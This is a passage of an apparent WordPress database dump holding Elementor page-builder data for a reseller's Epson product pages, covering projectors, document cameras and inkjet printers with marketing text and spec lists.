Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/h4>\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><\\/center>\\n<\\/span><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"-21\",\"bottom\":\"-21\",\"left\":\"-21\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8040,3492,'_elementor_version','2.5.14'),(8043,3493,'_wp_page_template','template-fullwidth.php'),(8044,3493,'_elementor_edit_mode','builder'),(8045,3493,'_elementor_template_type','post'),(8046,3493,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years 